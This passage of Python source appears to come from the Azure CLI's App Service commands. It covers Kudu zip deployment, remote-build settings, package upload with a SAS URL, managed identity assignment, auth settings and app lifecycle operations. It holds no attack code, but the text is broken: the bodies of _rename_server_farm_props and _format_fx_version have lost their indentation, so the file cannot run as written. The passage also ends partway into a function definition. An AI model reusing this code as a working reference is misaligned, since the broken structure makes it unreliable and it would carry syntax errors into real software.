def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Webapp-facing wrapper: zip-deploy *src* with no functionapp-specific handling."""
    return enable_zip_deploy(cmd, resource_group_name, name, src,
                             timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """POST the zip at *src* to Kudu's async zipdeploy endpoint and poll until done.

    Raises CLIError on a 409 (another deployment in progress, or
    WEBSITE_RUN_FROM_PACKAGE is set). Returns the final deployment
    status response.
    """
    logger.warning("Getting scm site credentials for zip deployment")
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    try:
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    except ValueError:
        raise CLIError('Failed to fetch scm url for function app')
    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'
    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    # NOTE: headers aliases authorization — the extra keys added below also
    # end up in the dict later passed to _check_zip_deployment_status.
    headers = authorization
    headers['Content-Type'] = 'application/octet-stream'
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()
    import requests
    import os
    from azure.cli.core.util import should_disable_connection_verify
    # Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
        logger.warning("Starting zip deployment. This operation can take a while to complete ...")
        res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
        logger.warning("Deployment endpoint responded with status code %d", res.status_code)
    # check if there's an ongoing process
    if res.status_code == 409:
        raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
                       "Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
                       "is removed.".format(deployment_status_url))
    # check the status of async deployment
    response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
                                            authorization, timeout)
    return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Configure app settings so the next zip deploy triggers a remote (Kudu/Oryx) build.

    Ensures SCM_DO_BUILD_DURING_DEPLOYMENT=true, removes
    WEBSITE_RUN_FROM_PACKAGE and ENABLE_ORYX_BUILD if present, then polls
    until the SCM site reflects the changes (or gives up with a warning).
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    website_run_from_package = None
    enable_oryx_build = None
    app_settings_should_not_have = []
    app_settings_should_contain = {}
    # Take stock of the current values of the three relevant settings.
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value
    if scm_do_build_during_deployment is not True:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
    if website_run_from_package:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
    if enable_oryx_build:
        logger.warning("Removing ENABLE_ORYX_BUILD app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD"
        ], slot)
        app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
    # Wait for scm site to get the latest app settings
    if app_settings_should_not_have or app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        retries = 10
        while not scm_is_up_to_date and retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain,
                should_not_have=app_settings_should_not_have)
            retries -= 1
            time.sleep(5)
        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Force SCM_DO_BUILD_DURING_DEPLOYMENT=false so Kudu does not build on deploy."""
    current = get_app_settings(cmd, resource_group_name, name, slot)
    build_flag = None
    for entry in current:
        if entry['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            build_flag = entry['value'].lower() in ('true', '1')
    expected = {}
    if build_flag is not False:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=false"
        ], slot)
        expected['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
    if not expected:
        return
    # Poll until the SCM (Kudu) site reflects the new app settings.
    logger.warning("Waiting SCM site to be updated with the latest app settings")
    in_sync = False
    attempts_left = 10
    while not in_sync and attempts_left >= 0:
        in_sync = validate_app_settings_in_scm(
            cmd, resource_group_name, name, slot,
            should_contain=expected)
        attempts_left -= 1
        time.sleep(5)
    if attempts_left < 0:
        logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
    """Upload *src* to the app's AzureWebJobsStorage account and run the app from that package.

    Creates/uses the 'function-releases' container, uploads the zip with
    a timestamped unique name, points WEBSITE_RUN_FROM_PACKAGE at a
    long-lived read-only SAS URL, then syncs the function triggers.
    Returns None.
    """
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    storage_connection = None
    for keyval in settings:
        if keyval['name'] == 'AzureWebJobsStorage':
            storage_connection = str(keyval['value'])
    if storage_connection is None:
        raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
    container_name = "function-releases"
    blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
    BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
    block_blob_service = BlockBlobService(connection_string=storage_connection)
    if not block_blob_service.exists(container_name):
        block_blob_service.create_container(container_name)
    # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
    def progress_callback(current, total):
        # Render a 30-char progress bar via the CLI progress controller.
        total_length = 30
        # NOTE(review): parenthesization puts /float(total) outside round —
        # presumably intended round(total_length * current / float(total));
        # confirm before changing.
        filled_length = int(round(total_length * current) / float(total))
        percents = round(100.0 * current / float(total), 1)
        progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
        progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
        cmd.cli_ctx.get_progress_controller().add(message=progress_message)
    block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
                                             progress_callback=progress_callback)
    # SAS window: starts 10 minutes in the past (clock skew) and lasts 520 weeks.
    now = datetime.datetime.now()
    blob_start = now - datetime.timedelta(minutes=10)
    blob_end = now + datetime.timedelta(weeks=520)
    BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
    blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
                                                                          blob_name,
                                                                          permission=BlobPermissions(read=True),
                                                                          expiry=blob_end,
                                                                          start=blob_start)
    blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
    website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
    update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
    client = web_client_factory(cmd.cli_ctx)
    try:
        logger.info('\nSyncing Triggers...')
        if slot is not None:
            client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
        else:
            client.web_apps.sync_function_triggers(resource_group_name, name)
    except CloudError as ce:
        # This SDK function throws an error if Status Code is 200
        if ce.status_code != 200:
            raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
                                setting_properties, slot=None, client=None):
    """Invoke a web_apps settings operation, switching to its '_slot' variant when a slot is given."""
    client = client or web_client_factory(cli_ctx)
    method_name = operation_name if slot is None else operation_name + '_slot'
    operation = getattr(client.web_apps, method_name)
    # NOTE(review): the bare `str` below is passed positionally — presumably
    # it fills the SDK method's next positional parameter; kept exactly as
    # in the original to preserve behavior. Confirm against azure-mgmt-web.
    if slot is None:
        return operation(resource_group_name, name, str, setting_properties)
    return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
    """Return site details, fetching from ARM unless an instance was already supplied.

    Also renames the server-farm property and attaches the FTP publishing URL.
    """
    # when invoked as a helper (not through a command), the caller may pass the site in
    webapp = app_instance or _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    _rename_server_farm_props(webapp)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
    return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Fetch the raw site object (getter for the generic updater)."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    return site
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
               skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
    """Create-or-update the site with the supplied envelope (setter for the generic updater)."""
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    call_args = {
        'resource_group_name': resource_group_name,
        'name': name,
        'site_envelope': instance,
        'skip_dns_registration': skip_dns_registration,
        'skip_custom_domain_verification': skip_custom_domain_verification,
        'force_dns_registration': force_dns_registration,
        'ttl_in_seconds': ttl_in_seconds,
    }
    if slot:
        call_args['slot'] = slot
        return client.web_apps.create_or_update_slot(**call_args)
    return client.web_apps.create_or_update(**call_args)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Apply in-place updates to a web app instance; function apps are rejected.

    Both flags arrive as 'true'/'false' strings and are converted to booleans.
    """
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    for attr, flag in (('client_affinity_enabled', client_affinity_enabled),
                       ('https_only', https_only)):
        if flag is not None:
            setattr(instance, attr, flag == 'true')
    return instance
def update_functionapp(cmd, instance, plan=None):
    """Optionally move a function app onto another (compatible) App Service plan."""
    client = web_client_factory(cmd.cli_ctx)
    if plan is None:
        return instance
    if is_valid_resource_id(plan):
        parsed = parse_resource_id(plan)
        dest_plan_info = client.app_service_plans.get(parsed['resource_group'], parsed['name'])
    else:
        # bare plan name: assume the app's own resource group
        dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
    if dest_plan_info is None:
        raise CLIError("The plan '{}' doesn't exist".format(plan))
    validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
    instance.server_farm_id = dest_plan_info.id
    return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
    """Raise CLIError unless both source and destination plans are Consumption or Elastic Premium."""
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    def _is_switchable(plan):
        # only these two plan families participate in the switch
        return is_plan_consumption(cmd, plan) or is_plan_elastic_premium(cmd, plan)
    src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
                                                 src_parse_result['name'])
    if src_plan_info is None:
        raise CLIError('Could not determine the current plan of the functionapp')
    if not _is_switchable(src_plan_info):
        raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
                       general_switch_msg)
    if not _is_switchable(dest_plan_instance):
        raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
                       general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Create-or-update a function app envelope (setter for the generic updater)."""
    instance = kwargs['parameters']
    if 'function' not in instance.kind:
        raise CLIError('Not a function app to update')
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    return web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
    """List sites that are NOT function apps."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' not in app.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List soft-deleted apps, sorted by deleted-site id."""
    deleted_sites = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    return sorted(deleted_sites, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a soft-deleted app into an existing site; content-only restore skips configuration."""
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id,
                                       recover_configuration=not restore_content_only)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
    """List only the function apps."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' in app.kind]
def _list_app(cli_ctx, resource_group_name=None):
    """Enumerate sites, optionally scoped to one resource group, with plan props renamed."""
    client = web_client_factory(cli_ctx)
    pager = (client.web_apps.list_by_resource_group(resource_group_name)
             if resource_group_name else client.web_apps.list())
    apps = list(pager)
    for app in apps:
        _rename_server_farm_props(app)
    return apps
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Collect deleted sites across every supported location, then filter client-side."""
    client = web_client_factory(cli_ctx)
    result = []
    for location in _get_deleted_apps_locations(cli_ctx):
        result.extend(client.deleted_web_apps.list_by_location(location))
    if resource_group_name:
        result = [r for r in result if r.resource_group == resource_group_name]
    if name:
        wanted_name = name.lower()
        result = [r for r in result if r.deleted_site_name.lower() == wanted_name]
    if slot:
        wanted_slot = slot.lower()
        result = [r for r in result if r.slot.lower() == wanted_slot]
    return result
def _build_identities_info(identities):
    """Split identity ids into (payload dict, type string, user-assigned ids, has-system-assigned).

    MSI_LOCAL_ID (or an empty input) stands for the system-assigned identity.
    """
    from ._appservice_utils import MSI_LOCAL_ID
    identities = identities or []
    external_identities = [x for x in identities if x != MSI_LOCAL_ID]
    identity_types = []
    if not identities or MSI_LOCAL_ID in identities:
        identity_types.append('SystemAssigned')
    if external_identities:
        identity_types.append('UserAssigned')
    identity_types = ','.join(identity_types)
    info = {'type': identity_types}
    if external_identities:
        info['userAssignedIdentities'] = {e: {} for e in external_identities}
    return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
    """Enable managed identities (system- and/or user-assigned) on a web app.

    assign_identities: identity resource ids to add; MSI_LOCAL_ID (or None) stands
    for the system-assigned identity. role/scope optionally create an RBAC
    assignment for the identity. Returns the updated site's identity object.
    """
    ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
                                                                  'ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
    _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
    def getter():
        # re-read the current site state (used by the retry loop in core's assign_identity)
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    def setter(webapp):
        # Derive the resulting identity type: whenever both kinds end up present
        # (pre-existing or requested now), it must be SystemAssigned,UserAssigned.
        if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities:
            identity_types = ResourceIdentityType.user_assigned
        else:
            identity_types = ResourceIdentityType.system_assigned
        if webapp.identity:
            webapp.identity.type = identity_types
        else:
            webapp.identity = ManagedServiceIdentity(type=identity_types)
        if external_identities:
            # merge requested user-assigned identities into the existing map
            if not webapp.identity.user_assigned_identities:
                webapp.identity.user_assigned_identities = {}
            for identity in external_identities:
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)
    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
    """Show the app's managed-identity block."""
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    return site.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
    """Remove managed identities from a web app.

    remove_identities: identity resource ids to remove; MSI_LOCAL_ID (or None)
    stands for the system-assigned identity. Returns the site's identity object
    after the update.
    """
    IdentityType = cmd.get_models('ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
    _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    def setter(webapp):
        if webapp.identity is None:
            # nothing assigned; nothing to remove
            return webapp
        to_remove = []
        # identity ids are compared case-insensitively
        existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
        if external_identities:
            to_remove = {x.lower() for x in external_identities}
            non_existing = to_remove.difference(existing_identities)
            if non_existing:
                raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
            if not list(existing_identities - to_remove):
                # removing the last user-assigned identity downgrades the identity type
                if webapp.identity.type == IdentityType.user_assigned:
                    webapp.identity.type = IdentityType.none
                elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
                    webapp.identity.type = IdentityType.system_assigned
        webapp.identity.user_assigned_identities = None
        if remove_local_identity:
            # drop the system-assigned part, keeping user-assigned where still present
            webapp.identity.type = (IdentityType.none
                                    if webapp.identity.type == IdentityType.system_assigned or
                                    webapp.identity.type == IdentityType.none
                                    else IdentityType.user_assigned)
        if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
            # rebuild the user-assigned map from whatever identities survive the removal
            webapp.identity.user_assigned_identities = {}
            if to_remove:
                for identity in list(existing_identities - to_remove):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
            else:
                for identity in list(existing_identities):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)
    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Fetch the site's authentication/authorization settings."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
    """Validate an auth runtime version string.

    Accepts None, '~<int>' (e.g. '~2'), or a dotted 'x.y.z' triple of integers.
    """
    def _is_int(token):
        try:
            int(token)
        except ValueError:
            return False
        return True
    if runtime_version is None:
        return True
    if runtime_version.startswith("~") and len(runtime_version) > 1:
        return _is_int(runtime_version[1:])
    parts = runtime_version.split('.')
    return len(parts) == 3 and all(_is_int(p) for p in parts)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None,  # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, runtime_version=None,  # pylint: disable=unused-argument
                         token_refresh_extension_hours=None,  # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None,  # pylint: disable=unused-argument
                         client_secret_certificate_thumbprint=None,  # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None,  # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None,  # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None,  # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None,  # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None,  # pylint: disable=unused-argument
                         microsoft_account_client_secret=None,  # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None):  # pylint: disable=unused-argument
    """Update the site's auth settings.

    Parameter names (after the first two) intentionally match AuthSettings
    attribute names 1:1 — they are copied onto the model by reflection below,
    so the pylint unused-argument suppressions are deliberate.
    """
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        # any other action value redirects anonymous users to the named provider's login page
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    # validate runtime version
    if not is_auth_runtime_version_valid(runtime_version):
        raise CLIError('Usage Error: --runtime-version set to invalid value')
    import inspect
    frame = inspect.currentframe()
    # these flags arrive as 'true'/'false' strings and are converted to booleans
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    # skip cmd/resource_group_name; copy every supplied (non-falsy) arg onto the model
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
    """List the worker instances hosting the app (or slot)."""
    # API Version 2019-08-01 (latest as of writing this code) does not return slot
    # instances, however 2018-02-01 does — so pin the older version here.
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
                                   api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
    """List runtime-stack display names straight from the stacks API."""
    client = web_client_factory(cmd.cli_ctx)
    helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
    return [stack['displayName'] for stack in helper.stacks]
def list_runtimes_hardcoded(linux=False):
    """Read the runtime display names from the bundled runtime-stacks JSON file."""
    platform_key = 'linux' if linux else 'windows'
    stacks = get_file_json(RUNTIME_STACKS)[platform_key]
    return [stack['displayName'] for stack in stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):
    """Delete an app (or slot); each keep_* flag suppresses the matching cleanup step."""
    client = web_client_factory(cmd.cli_ctx)
    # a truthy keep_* flag translates to an explicit False for the service;
    # otherwise None leaves the service default in place
    delete_kwargs = {
        'delete_metrics': False if keep_metrics else None,
        'delete_empty_server_farm': False if keep_empty_plan else None,
        'skip_dns_registration': False if keep_dns_registration else None,
    }
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot, **delete_kwargs)
    else:
        client.web_apps.delete(resource_group_name, name, **delete_kwargs)
def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop the app, or the named deployment slot."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start the app, or the named deployment slot."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart the app, or the named deployment slot."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Fetch the site's configuration object."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
    """List app settings, annotating each with whether it is a slot-sticky setting."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
    return _build_app_settings_output(app_settings.properties, sticky_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
                                 should_have=None, should_not_have=None, should_contain=None):
    """Check that the Kudu (SCM) site reflects the expected app settings.

    should_have: names that must be present; should_not_have: names that must be
    absent; should_contain: name->value pairs that must match exactly.
    Returns True when every supplied expectation holds.
    """
    scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
    scm_setting_keys = set(scm_settings)
    if should_have and not set(should_have) <= scm_setting_keys:
        return False
    if should_not_have and set(should_not_have) & scm_setting_keys:
        return False
    # merging the expected pairs must be a no-op if the values already match
    merged = scm_settings.copy()
    merged.update(should_contain or {})
    return merged == scm_settings
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
    """Fetch the app settings the Kudu (SCM) site actually sees, retrying on failure."""
    import requests
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    headers = {
        'Content-Type': 'application/octet-stream',
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent()
    }
    response = requests.get('{}/api/settings'.format(scm_url), headers=headers,
                            auth=(username, password), timeout=3)
    return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """List connection strings, flagging the slot-sticky ones."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .connection_string_names or []
    return [{'name': key,
             'value': pair.value,
             'type': pair.type,
             'slotSetting': key in sticky_names} for key, pair in conn_strings.properties.items()]
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """List the app's Azure-storage mounts, flagging slot-sticky entries."""
    client = web_client_factory(cmd.cli_ctx)
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .azure_storage_config_names or []
    return [{'name': key,
             'value': value,
             'slotSetting': key in sticky_names} for key, value in accounts.properties.items()]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publishing endpoint to *webapp* as 'ftpPublishingUrl'.

    Fix: use next() with a default of None instead of letting it raise
    StopIteration when the app has no FTP publish profile (e.g. FTP publishing
    disabled), which previously made 'webapp show' fail outright.
    """
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    url = next((p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP'), None)
    setattr(webapp, 'ftpPublishingUrl', url)
    return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
    """Point the app's fx-version (linux or windows, depending on app type) at the given image."""
    fx_version = _format_fx_version(custom_image_name)
    web_app = get_webapp(cmd, resource_group_name, name, slot)
    if not web_app:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    # 'reserved' marks a Linux app; 'is_xenon' marks a Windows-container app
    linux_fx = fx_version if web_app.reserved else None
    windows_fx = fx_version if web_app.is_xenon else None
    return update_site_configs(cmd, resource_group_name, name,
                               linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
    """Reset linux_fx_version to a single blank (the service's 'unset' value)."""
    return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
    """Return whichever fx-version (linux or windows) is set, or '' when neither is."""
    site_config = get_site_configs(cmd, resource_group_name, name, slot)
    return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
    """Return True only when *url* parses with a scheme, a netloc AND a path component."""
    try:
        parsed = urlparse(url)
    except ValueError:
        return False
    return bool(parsed.scheme and parsed.netloc and parsed.path)
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
